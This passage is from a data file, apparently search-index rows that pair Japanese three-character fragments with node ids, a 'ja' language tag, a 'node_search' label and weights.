('りお祝', 179, 'ja', 'node_search', 0.797402),
('りお祝', 180, 'ja', 'node_search', 0.882818),
('りお祝', 181, 'ja', 'node_search', 0.886095),
('りお祝', 185, 'ja', 'node_search', 0.839384),
('りお祝', 186, 'ja', 'node_search', 0.827757),
('りお祝', 188, 'ja', 'node_search', 0.836446),
('りお祝', 189, 'ja', 'node_search', 0.854391),
('りお祝', 191, 'ja', 'node_search', 0.892724),
('りお祝', 192, 'ja', 'node_search', 0.854391),
('りお祝', 193, 'ja', 'node_search', 0.873132),
('りお祝', 195, 'ja', 'node_search', 0.896076),
('りお祝', 196, 'ja', 'node_search', 0.879565),
('りお祝', 198, 'ja', 'node_search', 0.854391),
('りお祝', 199, 'ja', 'node_search', 0.854391),
('りがい', 188, 'ja', 'node_search', 0.945829),
('りがと', 135, 'ja', 'node_search', 0.664818),
('りして', 113, 'ja', 'node_search', 1),
('りしま', 80, 'ja', 'node_search', 1),
('りです', 27, 'ja', 'node_search', 1.18031),
('りです', 157, 'ja', 'node_search', 1),
('りとな', 156, 'ja', 'node_search', 1),
('りとな', 157, 'ja', 'node_search', 0.972861),
('りと専', 27, 'ja', 'node_search', 0.437873),
('りにす', 135, 'ja', 'node_search', 0.810915),
('りに思', 69, 'ja', 'node_search', 1),
('りに思', 87, 'ja', 'node_search', 0.597248),
('りまし', 3, 'ja', 'node_search', 1.15436),
('りまし', 23, 'ja', 'node_search', 0.759465),
('りまし', 68, 'ja', 'node_search', 1),
('りまし', 142, 'ja', 'node_search', 1),
('りまし', 144, 'ja', 'node_search', 1),
('りまし', 160, 'ja', 'node_search', 0.980874),
('りまし', 168, 'ja', 'node_search', 0.989021),
('りまし', 170, 'ja', 'node_search', 1),
('りまし', 178, 'ja', 'node_search', 1.96109),
('りまし', 180, 'ja', 'node_search', 1),
('りまし', 185, 'ja', 'node_search', 1),
('りまし', 187, 'ja', 'node_search', 1),
('りまし', 189, 'ja', 'node_search', 0.866793),
('りまし', 193, 'ja', 'node_search', 1),
('りまし', 194, 'ja', 'node_search', 0.896076),
('りまし', 196, 'ja', 'node_search', 1),
('りまし', 197, 'ja', 'node_search', 0.889397),
('りまし', 198, 'ja', 'node_search', 1),
('りまし', 199, 'ja', 'node_search', 1),
('ります', 3, 'ja', 'node_search', 1.64521),
('ります', 5, 'ja', 'node_search', 1.9347),
('ります', 8, 'ja', 'node_search', 2),
('ります', 18, 'ja', 'node_search', 1.9496),
('ります', 23, 'ja', 'node_search', 1.05832),
('ります', 24, 'ja', 'node_search', 3.56042),
('ります', 25, 'ja', 'node_search', 1),
('ります', 26, 'ja', 'node_search', 2),
('ります', 27, 'ja', 'node_search', 1.70083),
('ります', 30, 'ja', 'node_search', 1.8152),
('ります', 69, 'ja', 'node_search', 0.934703),
('ります', 73, 'ja', 'node_search', 1),
('ります', 140, 'ja', 'node_search', 1),
('ります', 142, 'ja', 'node_search', 0.78951),
('ります', 154, 'ja', 'node_search', 1.63826),
('ります', 155, 'ja', 'node_search', 0.797402),
('ります', 160, 'ja', 'node_search', 0.749958),
('ります', 161, 'ja', 'node_search', 2.55272),
('ります', 163, 'ja', 'node_search', 1),
('ります', 164, 'ja', 'node_search', 1.56876),
('ります', 165, 'ja', 'node_search', 2.4975),
('ります', 166, 'ja', 'node_search', 0.794753),
('ります', 167, 'ja', 'node_search', 1.70255),
('ります', 168, 'ja', 'node_search', 0.781775),
('ります', 169, 'ja', 'node_search', 0.860547),
('ります', 170, 'ja', 'node_search', 0.766757),
('ります', 171, 'ja', 'node_search', 0.839384),
('ります', 173, 'ja', 'node_search', 1.58964),
('ります', 174, 'ja', 'node_search', 2.3931),
('ります', 175, 'ja', 'node_search', 2.54858),
('ります', 176, 'ja', 'node_search', 1.62351),
('ります', 177, 'ja', 'node_search', 0.766757),
('ります', 178, 'ja', 'node_search', 0.836446),
('ります', 179, 'ja', 'node_search', 0.805455),
('ります', 181, 'ja', 'node_search', 0.896076),
('ります', 182, 'ja', 'node_search', 1.74619),
('ります', 183, 'ja', 'node_search', 1.64878),
('ります', 184, 'ja', 'node_search', 0.76431),
('ります', 185, 'ja', 'node_search', 1.72517),
('ります', 186, 'ja', 'node_search', 0.836446),
('ります', 187, 'ja', 'node_search', 0.766757),
('ります', 188, 'ja', 'node_search', 0.845322),
('ります', 189, 'ja', 'node_search', 0.752312),
('ります', 190, 'ja', 'node_search', 0.800068),
('ります', 191, 'ja', 'node_search', 1.89945),
('ります', 192, 'ja', 'node_search', 0.863659),
('ります', 194, 'ja', 'node_search', 0.781775),
('ります', 196, 'ja', 'node_search', 0.889397),
('ります', 197, 'ja', 'node_search', 0.800068),
('ります', 199, 'ja', 'node_search', 0.757065),
('りませ', 3, 'ja', 'node_search', 1.83938),
('りませ', 5, 'ja', 'node_search', 1.66194),
('りませ', 18, 'ja', 'node_search', 0.902857),
('りませ', 98, 'ja', 'node_search', 1),
('りや責', 189, 'ja', 'node_search', 1),
('りを持', 162, 'ja', 'node_search', 0.66666),
('りを継', 24, 'ja', 'node_search', 0.36769),
('り合い', 62, 'ja', 'node_search', 1),
('り多い', 165, 'ja', 'node_search', 0.845322),
('り多い', 166, 'ja', 'node_search', 0.833529),
('り多い', 178, 'ja', 'node_search', 0.889397),
('り多い', 185, 'ja', 'node_search', 0.784336),
('り多い', 187, 'ja', 'node_search', 0.810915),
('り巻く', 122, 'ja', 'node_search', 1),
('り広が', 183, 'ja', 'node_search', 27),
('り強い', 192, 'ja', 'node_search', 1),
('り強い', 196, 'ja', 'node_search', 1),
('り手掛', 27, 'ja', 'node_search', 0.520204),
('り期待', 182, 'ja', 'node_search', 0.854391),
('り期待', 183, 'ja', 'node_search', 0.784336),
('り期待', 197, 'ja', 'node_search', 0.816452),
('り申し', 156, 'ja', 'node_search', 0.972861),
('り申し', 157, 'ja', 'node_search', 0.857458),
('り申し', 169, 'ja', 'node_search', 0.805455),
('り申し', 171, 'ja', 'node_search', 0.792123),
('り申し', 176, 'ja', 'node_search', 0.813674),
('り申し', 177, 'ja', 'node_search', 0.725015),
('り申し', 178, 'ja', 'node_search', 0.794753),
('り申し', 195, 'ja', 'node_search', 0.819249),
('り直接', 27, 'ja', 'node_search', 0.320559),
('り組む', 69, 'ja', 'node_search', 1),
('り組め', 135, 'ja', 'node_search', 1),
('り組ん', 77, 'ja', 'node_search', 1),
('り組ん', 150, 'ja', 'node_search', 1),
('り良い', 111, 'ja', 'node_search', 1),
('り込ん', 24, 'ja', 'node_search', 0.740689),
('り願っ', 167, 'ja', 'node_search', 0.902857),
('り願っ', 169, 'ja', 'node_search', 0.876337),
('り願っ', 171, 'ja', 'node_search', 0.854391),
('り願っ', 173, 'ja', 'node_search', 0.842342),
('り願っ', 174, 'ja', 'node_search', 0.786915),
('り願っ', 175, 'ja', 'node_search', 0.848323),
('り願っ', 176, 'ja', 'node_search', 0.899454),
('り願っ', 177, 'ja', 'node_search', 0.779231),
('り願っ', 178, 'ja', 'node_search', 0.851346),
('り願っ', 184, 'ja', 'node_search', 0.776703),
('り願っ', 187, 'ja', 'node_search', 0.779231),
('り願っ', 190, 'ja', 'node_search', 0.813674),
('り願っ', 194, 'ja', 'node_search', 0.794753),
('るい未', 167, 'ja', 'node_search', 0.949597),
('るい未', 192, 'ja', 'node_search', 0.800068),
('るかの', 87, 'ja', 'node_search', 0.641769),
('るから', 3, 'ja', 'node_search', 0.942091),
('るぎな', 120, 'ja', 'node_search', 1),
('ること', 3, 'ja', 'node_search', 3.00189),
('ること', 23, 'ja', 'node_search', 0.417688),
('ること', 25, 'ja', 'node_search', 1),
('ること', 26, 'ja', 'node_search', 1),
('ること', 30, 'ja', 'node_search', 1.84234),
('ること', 68, 'ja', 'node_search', 1),
('ること', 80, 'ja', 'node_search', 1),
('ること', 98, 'ja', 'node_search', 2),
('ること', 116, 'ja', 'node_search', 1),
('ること', 122, 'ja', 'node_search', 2),
('ること', 135, 'ja', 'node_search', 1.6916),
('ること', 136, 'ja', 'node_search', 1.55521),
('ること', 138, 'ja', 'node_search', 1.5588),
('ること', 154, 'ja', 'node_search', 0.873132),
('ること', 156, 'ja', 'node_search', 1),
('ること', 157, 'ja', 'node_search', 0.899454),
('ること', 164, 'ja', 'node_search', 1.83353),
('ること', 165, 'ja', 'node_search', 0.824901),
('ること', 166, 'ja', 'node_search', 0.813674),
('ること', 167, 'ja', 'node_search', 0.920273),
('ること', 168, 'ja', 'node_search', 0.800068),
('ること', 169, 'ja', 'node_search', 0.892724),
('ること', 170, 'ja', 'node_search', 0.784336),
('ること', 171, 'ja', 'node_search', 1.86679),
('ること', 173, 'ja', 'node_search', 0.857458),
('ること', 174, 'ja', 'node_search', 0.800068),
('ること', 175, 'ja', 'node_search', 0.863659),
('ること', 176, 'ja', 'node_search', 0.916736),
('ること', 177, 'ja', 'node_search', 2.5234),
('ること', 178, 'ja', 'node_search', 0.866793),
('ること', 183, 'ja', 'node_search', 0.797402),
('ること', 184, 'ja', 'node_search', 0.78951),
('ること', 185, 'ja', 'node_search', 1.75169),
('ること', 187, 'ja', 'node_search', 0.792123),
('ること', 188, 'ja', 'node_search', 0.879565),
('ること', 189, 'ja', 'node_search', 0.769219),
('ること', 190, 'ja', 'node_search', 0.827757),
('ること', 193, 'ja', 'node_search', 0.906287),
('ること', 194, 'ja', 'node_search', 0.808176),
('ること', 195, 'ja', 'node_search', 0.968904),
('ること', 197, 'ja', 'node_search', 0.830633),
('ること', 199, 'ja', 'node_search', 0.774192),
('るこの', 62, 'ja', 'node_search', 0.526987),
('るご成', 161, 'ja', 'node_search', 0.771698),
('るご成', 186, 'ja', 'node_search', 0.78951),
('るご活', 178, 'ja', 'node_search', 0.813674),
('るそれ', 24, 'ja', 'node_search', 1),
('るため', 1, 'ja', 'node_search', 0.957226),
('るため', 6, 'ja', 'node_search', 6),
('るため', 23, 'ja', 'node_search', 0.441832),
('るため', 24, 'ja', 'node_search', 0.45501),
('るため', 136, 'ja', 'node_search', 0.873132),
('るため', 138, 'ja', 'node_search', 0.830633),
('るため', 140, 'ja', 'node_search', 0.851346),
('るため', 142, 'ja', 'node_search', 1.85785),
('るため', 192, 'ja', 'node_search', 0.972861),
('るだけ', 5, 'ja', 'node_search', 0.747619),
('るだけ', 28, 'ja', 'node_search', 1),
('るだけ', 138, 'ja', 'node_search', 0.976851),
('るだけ', 182, 'ja', 'node_search', 1),
('るだけ', 183, 'ja', 'node_search', 0.997306),
('るとい', 188, 'ja', 'node_search', 1),
('るとき', 87, 'ja', 'node_search', 16),
('るとと', 160, 'ja', 'node_search', 0.899454),
('るとと', 161, 'ja', 'node_search', 0.953396),
('るとと', 164, 'ja', 'node_search', 0.927431),
('るとと', 165, 'ja', 'node_search', 0.882818),
('るとと', 166, 'ja', 'node_search', 0.938382),
('るとと', 168, 'ja', 'node_search', 0.942091),
('るとと', 170, 'ja', 'node_search', 0.953396),
('るとと', 179, 'ja', 'node_search', 1.7767),
('るとと', 180, 'ja', 'node_search', 0.857458),
('るとと', 181, 'ja', 'node_search', 0.860547),
('るとと', 185, 'ja', 'node_search', 0.816452),
('るとと', 186, 'ja', 'node_search', 0.805455),
('るとと', 188, 'ja', 'node_search', 0.813674),
('るとと', 189, 'ja', 'node_search', 0.830633),
('るとと', 191, 'ja', 'node_search', 0.866793),
('るとと', 192, 'ja', 'node_search', 0.830633),
('るとと', 193, 'ja', 'node_search', 0.848323),
('るとと', 195, 'ja', 'node_search', 0.879565),
('るとと', 196, 'ja', 'node_search', 0.854391),
('るとと', 198, 'ja', 'node_search', 0.830633),
('るとと', 199, 'ja', 'node_search', 0.830633),
('ると良', 3, 'ja', 'node_search', 0.784336),
('るのは', 135, 'ja', 'node_search', 0.802752),
('るべき', 8, 'ja', 'node_search', 2),
('るまで', 23, 'ja', 'node_search', 0.771698),
('るもの', 179, 'ja', 'node_search', 0.972861),
('るよう', 23, 'ja', 'node_search', 0.474499),
('るよう', 27, 'ja', 'node_search', 0.304489),
('るよう', 135, 'ja', 'node_search', 1),
('るよう', 140, 'ja', 'node_search', 0.882818),
('るよう', 156, 'ja', 'node_search', 1),
('るよう', 157, 'ja', 'node_search', 0.961087),
('るキャ', 165, 'ja', 'node_search', 1),
('るケー', 3, 'ja', 'node_search', 0.565115),
('るサー', 1, 'ja', 'node_search', 1),
('るトレ', 24, 'ja', 'node_search', 0.372694),
('るニュ', 23, 'ja', 'node_search', 0.754681),
('るバス', 23, 'ja', 'node_search', 0.889397),
('るビザ', 7, 'ja', 'node_search', 5.64322),
('るビジ', 24, 'ja', 'node_search', 0.435532),
('るビジ', 87, 'ja', 'node_search', 0.661163),
('るリー', 25, 'ja', 'node_search', 1),
('るルー', 3, 'ja', 'node_search', 0.539902),
('る予定', 142, 'ja', 'node_search', 0.916736),
('る事業', 23, 'ja', 'node_search', 0.836446),
('る事業', 24, 'ja', 'node_search', 0.668514),
('る介護', 162, 'ja', 'node_search', 0.839384),
('る仕事', 69, 'ja', 'node_search', 1),
('る企業', 27, 'ja', 'node_search', 0.49376),
('る候補', 138, 'ja', 'node_search', 1),
('る先生', 62, 'ja', 'node_search', 0.976851),
('る前に', 142, 'ja', 'node_search', 0.754681),
('る前向', 120, 'ja', 'node_search', 0.927431),
('る可能', 8, 'ja', 'node_search', 2),
('る可能', 138, 'ja', 'node_search', 0.7017),
('る場合', 3, 'ja', 'node_search', 0.672252),
('る大切', 190, 'ja', 'node_search', 1),
('る大切', 197, 'ja', 'node_search', 1),
('る大変', 188, 'ja', 'node_search', 0.972861),
('る嬉し', 179, 'ja', 'node_search', 1),
('る学位', 10, 'ja', 'node_search', 1),
('る学校', 24, 'ja', 'node_search', 0.945829),
('る学生', 24, 'ja', 'node_search', 0.810915),
('る実践', 142, 'ja', 'node_search', 0.738408),
('る少人', 138, 'ja', 'node_search', 0.769219),
('る当社', 27, 'ja', 'node_search', 0.445866),
('る従業', 27, 'ja', 'node_search', 0.310946),
('る必要', 3, 'ja', 'node_search', 2.4441),
('る必要', 18, 'ja', 'node_search', 1.9496),
('る必要', 98, 'ja', 'node_search', 1),
('る必要', 142, 'ja', 'node_search', 0.808176),
('る成功', 113, 'ja', 'node_search', 1),
('る成功', 180, 'ja', 'node_search', 0.819249),
('る成功', 196, 'ja', 'node_search', 0.816452),
('る成長', 171, 'ja', 'node_search', 0.808176),
('る成長', 181, 'ja', 'node_search', 0.833529),
('る成長', 192, 'ja', 'node_search', 0.913226),
('る成長', 193, 'ja', 'node_search', 0.931053),
('る成長', 199, 'ja', 'node_search', 0.896076),
('る敬意', 122, 'ja', 'node_search', 1),
('る新し', 142, 'ja', 'node_search', 1),
('る新た', 183, 'ja', 'node_search', 27),
('る方に', 7, 'ja', 'node_search', 1.8861),
('る方は', 163, 'ja', 'node_search', 0.638366),
('る日本', 182, 'ja', 'node_search', 0.886095),
('る架け', 179, 'ja', 'node_search', 0.889397),
('る機会', 23, 'ja', 'node_search', 0.553478),
('る機会', 150, 'ja', 'node_search', 1),
('る機会', 192, 'ja', 'node_search', 0.879565),
('る求人', 163, 'ja', 'node_search', 0.968904),
('る海外', 3, 'ja', 'node_search', 0.549707),
('る準備', 120, 'ja', 'node_search', 1),
('る準備', 140, 'ja', 'node_search', 1),
('る準備', 165, 'ja', 'node_search', 1),
('る潜在', 138, 'ja', 'node_search', 0.689612),
('る熱心', 133, 'ja', 'node_search', 0.860547),
('る特定', 7, 'ja', 'node_search', 28.8861),
('る特定', 144, 'ja', 'node_search', 1),
('る目標', 183, 'ja', 'node_search', 0.857458),
('る知識', 155, 'ja', 'node_search', 1),
('る研修', 150, 'ja', 'node_search', 19),
('る私の', 122, 'ja', 'node_search', 0.923838),
('る素晴', 154, 'ja', 'node_search', 0.923838),
('る素晴', 164, 'ja', 'node_search', 0.997306),
('る素晴', 171, 'ja', 'node_search', 1),
('る素晴', 177, 'ja', 'node_search', 1),
('る経験', 18, 'ja', 'node_search', 1),
('る経験', 95, 'ja', 'node_search', 19),
('る習慣', 87, 'ja', 'node_search', 0.802752),
('る職業', 188, 'ja', 'node_search', 0.927431),
('る能力', 27, 'ja', 'node_search', 0.422736),
('る舞い', 87, 'ja', 'node_search', 0.879565),
('る見込', 29, 'ja', 'node_search', 3),
('る証明', 62, 'ja', 'node_search', 0.662985),
('る語彙', 3, 'ja', 'node_search', 0.802752),
('る豊か', 122, 'ja', 'node_search', 0.953396),
('る責任', 142, 'ja', 'node_search', 0.672252),
('る資格', 27, 'ja', 'node_search', 0.312899),
('る重要', 181, 'ja', 'node_search', 0.989021),
('る重要', 183, 'ja', 'node_search', 0.909743),
('る重要', 196, 'ja', 'node_search', 0.968904),
('る際の', 133, 'ja', 'node_search', 1),
('る際使', 24, 'ja', 'node_search', 1),
('る面接', 197, 'ja', 'node_search', 1),
('る韓国', 24, 'ja', 'node_search', 0.42791),
('る魅力', 185, 'ja', 'node_search', 0.902857),
('れいに', 87, 'ja', 'node_search', 0.949597),
('れから', 160, 'ja', 'node_search', 0.836446),
('れから', 161, 'ja', 'node_search', 0.882818),
('れから', 164, 'ja', 'node_search', 0.810915),
('れから', 173, 'ja', 'node_search', 0.822065),
('れから', 175, 'ja', 'node_search', 0.830633),
('れから', 176, 'ja', 'node_search', 0.797402),
('れぞれ', 24, 'ja', 'node_search', 0.997306),
('れぞれ', 136, 'ja', 'node_search', 0.945829),
('れぞれ', 173, 'ja', 'node_search', 0.906287),
('れたこ', 154, 'ja', 'node_search', 1),
('れたこ', 160, 'ja', 'node_search', 1),
('れたこ', 161, 'ja', 'node_search', 1),
('れたこ', 164, 'ja', 'node_search', 1),
('れたこ', 165, 'ja', 'node_search', 1),
('れたこ', 166, 'ja', 'node_search', 1),
('れたこ', 167, 'ja', 'node_search', 1),
('れたこ', 168, 'ja', 'node_search', 1),
('れたこ', 169, 'ja', 'node_search', 1),
('れたこ', 170, 'ja', 'node_search', 1),
('れたこ', 171, 'ja', 'node_search', 1),
('れたこ', 173, 'ja', 'node_search', 1),
('れたこ', 174, 'ja', 'node_search', 1),
('れたこ', 175, 'ja', 'node_search', 1),
('れたこ', 176, 'ja', 'node_search', 1),
('れたこ', 177, 'ja', 'node_search', 1),
('れたこ', 178, 'ja', 'node_search', 1),
('れたこ', 180, 'ja', 'node_search', 1),
('れたこ', 181, 'ja', 'node_search', 1),
('れたこ', 182, 'ja', 'node_search', 1),
('れたこ', 183, 'ja', 'node_search', 1),
('れたこ', 184, 'ja', 'node_search', 1),
('れたこ', 185, 'ja', 'node_search', 1),
('れたこ', 186, 'ja', 'node_search', 1),
('れたこ', 187, 'ja', 'node_search', 1),
('れたこ', 188, 'ja', 'node_search', 1),
('れたこ', 189, 'ja', 'node_search', 1.90286),
('れたこ', 190, 'ja', 'node_search', 1),
('れたこ', 191, 'ja', 'node_search', 1),
('れたこ', 192, 'ja', 'node_search', 1),
('れたこ', 193, 'ja', 'node_search', 1),
('れたこ', 194, 'ja', 'node_search', 1),
('れたこ', 195, 'ja', 'node_search', 1),
('れたこ', 196, 'ja', 'node_search', 1),
('れたこ', 197, 'ja', 'node_search', 1),
('れたこ', 198, 'ja', 'node_search', 1),
('れたこ', 199, 'ja', 'node_search', 1),
('れたコ', 62, 'ja', 'node_search', 4),
('れた候', 156, 'ja', 'node_search', 1.94583),
('れた候', 157, 'ja', 'node_search', 0.836446),
('れた姉', 69, 'ja', 'node_search', 1),
('れた学', 24, 'ja', 'node_search', 0.635),
('れた資', 27, 'ja', 'node_search', 0.567769),
('れてい', 5, 'ja', 'node_search', 3),
('れてい', 7, 'ja', 'node_search', 1.8861),
('れてい', 27, 'ja', 'node_search', 1.4619),
('れてい', 140, 'ja', 'node_search', 0.860547),
('れてい', 162, 'ja', 'node_search', 0.848323),
('れてい', 187, 'ja', 'node_search', 0.882818),
('れです', 188, 'ja', 'node_search', 1),
('れなか', 3, 'ja', 'node_search', 0.575885),
('れの国', 24, 'ja', 'node_search', 0.989021),
('れの目', 173, 'ja', 'node_search', 0.899454),
('れの職', 136, 'ja', 'node_search', 0.938382),
('ればな', 18, 'ja', 'node_search', 0.913226),
('れば尚', 30, 'ja', 'node_search', 0.934703),
('れば銀', 3, 'ja', 'node_search', 1),
('れまし', 19, 'ja', 'node_search', 2),
('れまし', 27, 'ja', 'node_search', 0.334826),
('れまし', 160, 'ja', 'node_search', 0.745294),
('れまし', 161, 'ja', 'node_search', 0.747619),
('れまし', 164, 'ja', 'node_search', 0.749958),
('れまし', 165, 'ja', 'node_search', 0.747619),
('れまし', 166, 'ja', 'node_search', 0.769219),
('れまし', 167, 'ja', 'node_search', 0.816452),
('れまし', 168, 'ja', 'node_search', 0.757065),
('れまし', 169, 'ja', 'node_search', 0.786915),
('れまし', 170, 'ja', 'node_search', 0.742984),
('れまし', 171, 'ja', 'node_search', 0.771698),
('れまし', 173, 'ja', 'node_search', 0.76188),
('れまし', 174, 'ja', 'node_search', 0.718502),
('れまし', 175, 'ja', 'node_search', 1.76431),
('れまし', 176, 'ja', 'node_search', 0.740689),
('れまし', 177, 'ja', 'node_search', 1.56746),
('れまし', 178, 'ja', 'node_search', 0.779231),
('れまし', 179, 'ja', 'node_search', 1.73165),
('れまし', 180, 'ja', 'node_search', 0.800068),
('れまし', 181, 'ja', 'node_search', 1.78178),
('れまし', 182, 'ja', 'node_search', 1.79212),
('れまし', 183, 'ja', 'node_search', 1.73165),
('れまし', 184, 'ja', 'node_search', 1.75707),
('れまし', 185, 'ja', 'node_search', 0.752312),
('れまし', 186, 'ja', 'node_search', 0.769219),
('れまし', 187, 'ja', 'node_search', 1.6918),
('れまし', 188, 'ja', 'node_search', 0.759465),
('れまし', 189, 'ja', 'node_search', 0.747619),
('れまし', 190, 'ja', 'node_search', 1.69306),
('れまし', 191, 'ja', 'node_search', 0.805455),
('れまし', 192, 'ja', 'node_search', 0.776703),
('れまし', 193, 'ja', 'node_search', 0.794753),
('れまし', 194, 'ja', 'node_search', 1.75231),
('れまし', 195, 'ja', 'node_search', 0.805455),
('れまし', 196, 'ja', 'node_search', 0.794753),
('れまし', 197, 'ja', 'node_search', 0.766757),
('れまし', 198, 'ja', 'node_search', 0.781775),
('れまし', 199, 'ja', 'node_search', 0.754681),
('れます', 6, 'ja', 'node_search', 3),
('れます', 62, 'ja', 'node_search', 0.648686),
('れます', 126, 'ja', 'node_search', 1),
('れます', 142, 'ja', 'node_search', 1),
('れます', 167, 'ja', 'node_search', 1),
('れます', 169, 'ja', 'node_search', 0.98493),
('れます', 173, 'ja', 'node_search', 0.945829),
('れます', 174, 'ja', 'node_search', 1),
('れます', 176, 'ja', 'node_search', 1),
('れます', 180, 'ja', 'node_search', 0.892724),
('れます', 184, 'ja', 'node_search', 0.873132),
('れます', 185, 'ja', 'node_search', 0.848323),
('れます', 186, 'ja', 'node_search', 0.923838),
('れます', 189, 'ja', 'node_search', 0.968904),
('れます', 193, 'ja', 'node_search', 0.882818),
('れます', 195, 'ja', 'node_search', 0.942091),
('れます', 198, 'ja', 'node_search', 0.896076),
('れます', 199, 'ja', 'node_search', 0.863659),
('れまで', 171, 'ja', 'node_search', 0.968904),
('れまで', 174, 'ja', 'node_search', 1),
('れまで', 175, 'ja', 'node_search', 1),
('れまで', 176, 'ja', 'node_search', 1),
('れまで', 177, 'ja', 'node_search', 0.96498),
('れまで', 178, 'ja', 'node_search', 1),
('れまで', 184, 'ja', 'node_search', 1),
('れまで', 187, 'ja', 'node_search', 1),
('れらの', 136, 'ja', 'node_search', 0.670377),
('れるこ', 3, 'ja', 'node_search', 1),
('れるこ', 154, 'ja', 'node_search', 0.876337),
('れるこ', 156, 'ja', 'node_search', 1),
('れるこ', 157, 'ja', 'node_search', 0.902857),
('れるこ', 164, 'ja', 'node_search', 1),
('れるこ', 167, 'ja', 'node_search', 0.923838),
('れるこ', 169, 'ja', 'node_search', 0.896076),
('れるこ', 171, 'ja', 'node_search', 1),
('れるこ', 173, 'ja', 'node_search', 0.860547),
('れるこ', 174, 'ja', 'node_search', 0.802752),
('れるこ', 175, 'ja', 'node_search', 0.866793),
('れるこ', 176, 'ja', 'node_search', 0.920273),
('れるこ', 177, 'ja', 'node_search', 2.5234),
('れるこ', 183, 'ja', 'node_search', 0.800068),
('れるこ', 184, 'ja', 'node_search', 0.792123),
('れるこ', 185, 'ja', 'node_search', 0.989021),
('れるこ', 188, 'ja', 'node_search', 0.882818),
('れるこ', 190, 'ja', 'node_search', 0.830633),
('れるこ', 194, 'ja', 'node_search', 0.810915),
('れるこ', 195, 'ja', 'node_search', 0.972861),
('れるこ', 197, 'ja', 'node_search', 0.833529),
('れるた', 6, 'ja', 'node_search', 3),
('れるべ', 8, 'ja', 'node_search', 2),
('れるバ', 23, 'ja', 'node_search', 0.892724),
('れるビ', 7, 'ja', 'node_search', 1.8861),
('れるビ', 24, 'ja', 'node_search', 0.436309),
('れるリ', 25, 'ja', 'node_search', 1),
('れる前', 120, 'ja', 'node_search', 0.931053),
('れる大', 190, 'ja', 'node_search', 1),
('れる見', 29, 'ja', 'node_search', 3),
('れを示', 87, 'ja', 'node_search', 0.577261),
('れ以上', 10, 'ja', 'node_search', 1),
('わずに', 23, 'ja', 'node_search', 0.617112),
('わせく', 1, 'ja', 'node_search', 1),
('わせく', 155, 'ja', 'node_search', 0.640063),
('わせく', 162, 'ja', 'node_search', 0.618696),
('わせく', 163, 'ja', 'node_search', 0.620288),
('わせて', 23, 'ja', 'node_search', 0.676032),
('わたっ', 150, 'ja', 'node_search', 1),
('わたる', 165, 'ja', 'node_search', 1),
('わりと', 27, 'ja', 'node_search', 0.438659),
('われま', 142, 'ja', 'node_search', 1),
('われる', 23, 'ja', 'node_search', 0.896076),
('をお持', 163, 'ja', 'node_search', 0.677939),
('をお楽', 1, 'ja', 'node_search', 1),
('をお知', 161, 'ja', 'node_search', 1),
('をお知', 166, 'ja', 'node_search', 1),
('をお知', 168, 'ja', 'node_search', 1),
('をお知', 170, 'ja', 'node_search', 1),
('をお知', 178, 'ja', 'node_search', 1),
('をお知', 180, 'ja', 'node_search', 1),
('をお知', 181, 'ja', 'node_search', 1),
('をお知', 182, 'ja', 'node_search', 1),
('をお知', 183, 'ja', 'node_search', 1),
('をお知', 185, 'ja', 'node_search', 1),
('をお知', 186, 'ja', 'node_search', 1),
('をお知', 187, 'ja', 'node_search', 1),
('をお知', 188, 'ja', 'node_search', 1),
('をお知', 189, 'ja', 'node_search', 1),
('をお知', 190, 'ja', 'node_search', 1),
('をお知', 191, 'ja', 'node_search', 1),
('をお知', 192, 'ja', 'node_search', 1),
('をお知', 193, 'ja', 'node_search', 1),
('をお知', 194, 'ja', 'node_search', 1),
('をお知', 195, 'ja', 'node_search', 1),
('をお知', 196, 'ja', 'node_search', 1),
('をお知', 197, 'ja', 'node_search', 1),
('をお知', 198, 'ja', 'node_search', 1),
('をお知', 199, 'ja', 'node_search', 1),
('をお祈', 80, 'ja', 'node_search', 1),
('をお祈', 113, 'ja', 'node_search', 1),
('をお祈', 160, 'ja', 'node_search', 0.851346),
('をお祈', 161, 'ja', 'node_search', 0.899454),
('をお祈', 166, 'ja', 'node_search', 0.879565),
('をお祈', 168, 'ja', 'node_search', 0.882818),
('をお祈', 169, 'ja', 'node_search', 0.813674),
('をお祈', 170, 'ja', 'node_search', 0.892724),
('をお祈', 171, 'ja', 'node_search', 0.800068),
('をお祈', 176, 'ja', 'node_search', 0.822065),
('をお祈', 177, 'ja', 'node_search', 0.731649),
('をお祈', 178, 'ja', 'node_search', 0.802752),
('をお祈', 179, 'ja', 'node_search', 0.745294),
('をお祈', 180, 'ja', 'node_search', 0.810915),
('をお祈', 181, 'ja', 'node_search', 0.813674),
('をお祈', 186, 'ja', 'node_search', 0.779231),
('をお祈', 188, 'ja', 'node_search', 0.771698),
('をお祈', 191, 'ja', 'node_search', 0.819249),
('をお祈', 192, 'ja', 'node_search', 0.78951),
('をお祈', 193, 'ja', 'node_search', 0.805455),
('をお祈', 195, 'ja', 'node_search', 0.827757),
('をお祈', 196, 'ja', 'node_search', 0.808176),
('をお祈', 198, 'ja', 'node_search', 0.792123),
('をお見', 62, 'ja', 'node_search', 0.517983),
('をかけ', 24, 'ja', 'node_search', 0.513597),
('をかけ', 62, 'ja', 'node_search', 4),
('をご報', 154, 'ja', 'node_search', 1),
('をご報', 160, 'ja', 'node_search', 1),
('をご報', 164, 'ja', 'node_search', 1),
('をご報', 165, 'ja', 'node_search', 1),
('をご報', 167, 'ja', 'node_search', 1),
('をご報', 169, 'ja', 'node_search', 1),
('をご報', 171, 'ja', 'node_search', 1),
('をご報', 173, 'ja', 'node_search', 1),
('をご報', 174, 'ja', 'node_search', 1),
('をご報', 175, 'ja', 'node_search', 1),
('をご報', 176, 'ja', 'node_search', 1),
('をご報', 177, 'ja', 'node_search', 1),
('をご報', 179, 'ja', 'node_search', 1),
('をご報', 184, 'ja', 'node_search', 1),
('をご紹', 162, 'ja', 'node_search', 1),
('をして', 24, 'ja', 'node_search', 2.48978),
('をして', 120, 'ja', 'node_search', 1),
('をして', 138, 'ja', 'node_search', 1),
('をしな', 140, 'ja', 'node_search', 0.993146),
('をしま', 87, 'ja', 'node_search', 1.80833),
('をする', 133, 'ja', 'node_search', 1),
('をつけ', 87, 'ja', 'node_search', 0.794753),
('をつな', 160, 'ja', 'node_search', 0.794753),
('をでき', 28, 'ja', 'node_search', 1),
('をとり', 87, 'ja', 'node_search', 0.779231),
('をよく', 87, 'ja', 'node_search', 0.980874),
('をサポ', 1, 'ja', 'node_search', 0.980874),
('をサポ', 5, 'ja', 'node_search', 0.839384),
('をサポ', 62, 'ja', 'node_search', 0.931053),
('をシン', 30, 'ja', 'node_search', 28),
('をスタ', 156, 'ja', 'node_search', 1),
('をスタ', 157, 'ja', 'node_search', 0.889397),
